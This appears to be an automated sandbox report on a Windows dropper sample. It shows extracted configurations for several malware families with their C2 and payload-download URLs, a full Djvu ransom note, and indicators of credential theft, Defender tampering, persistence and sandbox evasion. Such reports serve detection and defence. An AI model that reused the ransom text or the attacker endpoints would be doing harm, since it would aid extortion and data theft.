djvu | 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135

Analysis

max time kernel
147s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
Size

4.0MB
MD5

8dcf7d03311c30ff6902530f95f77b36
SHA1

b5f441c49823cbd4f253163d233452927df777d8
SHA256

7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135
SHA512

7b605bef4c177406606f6abb4baf1781525aa150b5dab8b129bd52fdc6f4f485cea589fe93161d4c353c947fe2214ea84b1329d5212c73e410fccbe20f4cf6b4

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzkida

185.11.73.55:22201

Attributes

auth_value
000938fe0d697ca6a3b6cee46ba02ff3

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/6400-312-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/6400-350-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/6400-352-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/6400-356-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5548-244-0x0000000000640000-0x0000000000790000-memory.dmp	family_redline
behavioral2/memory/5548-256-0x0000000000640000-0x0000000000790000-memory.dmp	family_redline
behavioral2/memory/5548-257-0x0000000000640000-0x0000000000790000-memory.dmp	family_redline
behavioral2/memory/5548-265-0x0000000000640000-0x0000000000790000-memory.dmp	family_redline
behavioral2/memory/5548-295-0x0000000000640000-0x0000000000790000-memory.dmp	family_redline
behavioral2/memory/6380-311-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/6192-332-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3320-156-0x0000000000AE0000-0x0000000000B10000-memory.dmp	family_onlylogger
behavioral2/memory/3320-157-0x0000000000400000-0x00000000009C0000-memory.dmp	family_onlylogger
behavioral2/memory/5688-279-0x0000000000610000-0x0000000000654000-memory.dmp	family_onlylogger

Blocklisted process makes network request 5 IoCs

Processes:

powershell.EXErundll32.exe

flow pid process

250 5308 powershell.EXE
253 5308 powershell.EXE
261 5308 powershell.EXE
266 6148 rundll32.exe
270 6148 rundll32.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
250	5308	powershell.EXE
253	5308	powershell.EXE
261	5308	powershell.EXE
266	6148	rundll32.exe
270	6148	rundll32.exe

Executes dropped EXE 48 IoCs

Processes:

Files.exeInstall.exeKRSetp.exejg3_3uag.exeFile.exeFolder.exeInstallation.exepzyh.exepub2.exeInfo.exejfiag3g_gg.exejfiag3g_gg.exeRK_4rgTt5CcW3iNxDT6xO9bL.exeLuC7opz56ZHv9DMKAzniWXla.exeRxWV8a03ZV04XB88tc2CXbRj.exeGzkt5mHpxF1v1F6ko7n6Ojln.exepowershell.EXE8yNuAlksxt9ERCQBLnTf5R7s.exe3C5chxgmdIM7FCOvWctXQCVO.exeftGHhdmXOThAq7aPthuyzF9H.exePGrgYrmjIUuPTUnxq9jnhp_9.exeHxMqtYZIUVTsFBvCoEA3Pki_.exefind.exethSjL5N0VAxIgAXhHP6f09aM.exeZQfEwTalmYFjc4TLiZPAYIzG.exeQwtjZdfAu0PgtINFi4Nvj66n.exelx0psHagf6RnnGkhZ0Fowal4.exeAMmh7Hp1kuB7JaUBXLLtucDo.exezhD7lRTUvJmwo8erfpdnVTWv.exe4E1sEd5y60BTJLCX9pPJHvn6.exek3wOXzGlwzQprfZ7dKwqK6sN.exeaE5gGpDGF09P287uBSM8LvUs.exeOXTwCzYYERQoTolMsvuosWem.exez63VCPkRi8gB3YlO5uw17UaM.exe34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exeInstall.exezhD7lRTUvJmwo8erfpdnVTWv.exelx0psHagf6RnnGkhZ0Fowal4.exeInstall.exedada.exedada.exebuild.exebuild.exebkkimcju.exeirrptjqb.exeAccostarmi.exe.pifLxjwaytgkwrfchptbandzip.exeMoUSO.exe

pid	process
2556	Files.exe
3320	Install.exe
5004	KRSetp.exe
4468	jg3_3uag.exe
1964	File.exe
1880	Folder.exe
4932	Installation.exe
4864	pzyh.exe
1252	pub2.exe
4708	Info.exe
3364	jfiag3g_gg.exe
5060	jfiag3g_gg.exe
5140	RK_4rgTt5CcW3iNxDT6xO9bL.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5212	RxWV8a03ZV04XB88tc2CXbRj.exe
5252	Gzkt5mHpxF1v1F6ko7n6Ojln.exe
5308	powershell.EXE
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5408	3C5chxgmdIM7FCOvWctXQCVO.exe
5504	ftGHhdmXOThAq7aPthuyzF9H.exe
5520	PGrgYrmjIUuPTUnxq9jnhp_9.exe
5512	HxMqtYZIUVTsFBvCoEA3Pki_.exe
5532	find.exe
5548	thSjL5N0VAxIgAXhHP6f09aM.exe
5536	ZQfEwTalmYFjc4TLiZPAYIzG.exe
5600	QwtjZdfAu0PgtINFi4Nvj66n.exe
5640	lx0psHagf6RnnGkhZ0Fowal4.exe
5648	AMmh7Hp1kuB7JaUBXLLtucDo.exe
5672	zhD7lRTUvJmwo8erfpdnVTWv.exe
5680	4E1sEd5y60BTJLCX9pPJHvn6.exe
5688	k3wOXzGlwzQprfZ7dKwqK6sN.exe
5696	aE5gGpDGF09P287uBSM8LvUs.exe
5704	OXTwCzYYERQoTolMsvuosWem.exe
5720	z63VCPkRi8gB3YlO5uw17UaM.exe
3936	34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
6264	Install.exe
6400	zhD7lRTUvJmwo8erfpdnVTWv.exe
6192	lx0psHagf6RnnGkhZ0Fowal4.exe
5188	Install.exe
5832	dada.exe
6140	dada.exe
2328	build.exe
2456	build.exe
5208	bkkimcju.exe
7024	irrptjqb.exe
224	Accostarmi.exe.pif
6912	Lxjwaytgkwrfchptbandzip.exe
4428	MoUSO.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
behavioral2/memory/4468-142-0x0000000000400000-0x0000000000651000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exePGrgYrmjIUuPTUnxq9jnhp_9.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	PGrgYrmjIUuPTUnxq9jnhp_9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	PGrgYrmjIUuPTUnxq9jnhp_9.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ZQfEwTalmYFjc4TLiZPAYIzG.exeGzkt5mHpxF1v1F6ko7n6Ojln.exeOXTwCzYYERQoTolMsvuosWem.exe7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exeInfo.exebuild.exeFolder.exeftGHhdmXOThAq7aPthuyzF9H.exeRxWV8a03ZV04XB88tc2CXbRj.exebkkimcju.exeInstall.exek3wOXzGlwzQprfZ7dKwqK6sN.exeFiles.exeRK_4rgTt5CcW3iNxDT6xO9bL.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ZQfEwTalmYFjc4TLiZPAYIzG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Gzkt5mHpxF1v1F6ko7n6Ojln.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	OXTwCzYYERQoTolMsvuosWem.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Info.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	build.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ftGHhdmXOThAq7aPthuyzF9H.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	RxWV8a03ZV04XB88tc2CXbRj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	bkkimcju.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	k3wOXzGlwzQprfZ7dKwqK6sN.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Files.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	RK_4rgTt5CcW3iNxDT6xO9bL.exe

Loads dropped DLL 24 IoCs

Processes:

pub2.exerUNdlL32.eXeLuC7opz56ZHv9DMKAzniWXla.exe8yNuAlksxt9ERCQBLnTf5R7s.exepowershell.EXE

pid	process
1252	pub2.exe
3340	rUNdlL32.eXe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5148	LuC7opz56ZHv9DMKAzniWXla.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5316	8yNuAlksxt9ERCQBLnTf5R7s.exe
5308	powershell.EXE
5308	powershell.EXE

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

pzyh.exemsedge.exeRxWV8a03ZV04XB88tc2CXbRj.exeftGHhdmXOThAq7aPthuyzF9H.exeOXTwCzYYERQoTolMsvuosWem.exeZQfEwTalmYFjc4TLiZPAYIzG.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\RxWV8a03ZV04XB88tc2CXbRj.exe"	RxWV8a03ZV04XB88tc2CXbRj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\ftGHhdmXOThAq7aPthuyzF9H.exe"	ftGHhdmXOThAq7aPthuyzF9H.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unyridm = "\"C:\\Users\\Admin\\bkkimcju.exe\""	OXTwCzYYERQoTolMsvuosWem.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\""	ZQfEwTalmYFjc4TLiZPAYIzG.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

PGrgYrmjIUuPTUnxq9jnhp_9.exejg3_3uag.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	PGrgYrmjIUuPTUnxq9jnhp_9.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg3_3uag.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

230 ipinfo.io
232 ipinfo.io
239 ipinfo.io
240 ipinfo.io
14 ip-api.com
18 ipinfo.io
19 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
230	ipinfo.io
232	ipinfo.io
239	ipinfo.io
240	ipinfo.io
14	ip-api.com
18	ipinfo.io
19	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

thSjL5N0VAxIgAXhHP6f09aM.exeAMmh7Hp1kuB7JaUBXLLtucDo.exe

pid process

5548 thSjL5N0VAxIgAXhHP6f09aM.exe
5648 AMmh7Hp1kuB7JaUBXLLtucDo.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
5548	thSjL5N0VAxIgAXhHP6f09aM.exe
5648	AMmh7Hp1kuB7JaUBXLLtucDo.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

zhD7lRTUvJmwo8erfpdnVTWv.exePGrgYrmjIUuPTUnxq9jnhp_9.exelx0psHagf6RnnGkhZ0Fowal4.exeirrptjqb.exeZQfEwTalmYFjc4TLiZPAYIzG.exe

description	pid	process	target process
PID 5672 set thread context of 6400	5672	zhD7lRTUvJmwo8erfpdnVTWv.exe	zhD7lRTUvJmwo8erfpdnVTWv.exe
PID 5520 set thread context of 6380	5520	PGrgYrmjIUuPTUnxq9jnhp_9.exe	AppLaunch.exe
PID 5640 set thread context of 6192	5640	lx0psHagf6RnnGkhZ0Fowal4.exe	lx0psHagf6RnnGkhZ0Fowal4.exe
PID 7024 set thread context of 2160	7024	irrptjqb.exe	svchost.exe
PID 5536 set thread context of 6908	5536	ZQfEwTalmYFjc4TLiZPAYIzG.exe	MSBuild.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220312194133.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\08a81096-2458-4d09-bc32-1cdd20f508f6.tmp	setup.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 31 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2920	3320	WerFault.exe	Install.exe
944	3340	WerFault.exe	rUNdlL32.eXe
1568	3320	WerFault.exe	Install.exe
3228	3320	WerFault.exe	Install.exe
3316	3320	WerFault.exe	Install.exe
4064	3320	WerFault.exe	Install.exe
3840	3320	WerFault.exe	Install.exe
3392	3320	WerFault.exe	Install.exe
4796	3320	WerFault.exe	Install.exe
4948	5532	WerFault.exe	gcZHL1UuAAZsKYs16SSxBhPd.exe
4672	5680	WerFault.exe	4E1sEd5y60BTJLCX9pPJHvn6.exe
6248	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
6164	5720	WerFault.exe	z63VCPkRi8gB3YlO5uw17UaM.exe
6936	5532	WerFault.exe	gcZHL1UuAAZsKYs16SSxBhPd.exe
6364	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
6436	5720	WerFault.exe	z63VCPkRi8gB3YlO5uw17UaM.exe
6444	5680	WerFault.exe	4E1sEd5y60BTJLCX9pPJHvn6.exe
6892	5704	WerFault.exe	OXTwCzYYERQoTolMsvuosWem.exe
6832	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
400	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
6528	5208	WerFault.exe	bkkimcju.exe
4948	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
6436	5408	WerFault.exe	3C5chxgmdIM7FCOvWctXQCVO.exe
6888	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
6656	5408	WerFault.exe	3C5chxgmdIM7FCOvWctXQCVO.exe
4916	7024	WerFault.exe	irrptjqb.exe
6348	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
2788	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
2500	5688	WerFault.exe	k3wOXzGlwzQprfZ7dKwqK6sN.exe
5676	3320	WerFault.exe	Install.exe
7140	3320	WerFault.exe	Install.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Lxjwaytgkwrfchptbandzip.exepub2.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Lxjwaytgkwrfchptbandzip.exe

Checks processor information in registry 2 TTPs 27 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3C5chxgmdIM7FCOvWctXQCVO.exe8yNuAlksxt9ERCQBLnTf5R7s.exe34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exepowershell.EXELuC7opz56ZHv9DMKAzniWXla.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	3C5chxgmdIM7FCOvWctXQCVO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	8yNuAlksxt9ERCQBLnTf5R7s.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3C5chxgmdIM7FCOvWctXQCVO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	3C5chxgmdIM7FCOvWctXQCVO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	LuC7opz56ZHv9DMKAzniWXla.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3C5chxgmdIM7FCOvWctXQCVO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	3C5chxgmdIM7FCOvWctXQCVO.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	3C5chxgmdIM7FCOvWctXQCVO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	3C5chxgmdIM7FCOvWctXQCVO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	LuC7opz56ZHv9DMKAzniWXla.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	8yNuAlksxt9ERCQBLnTf5R7s.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
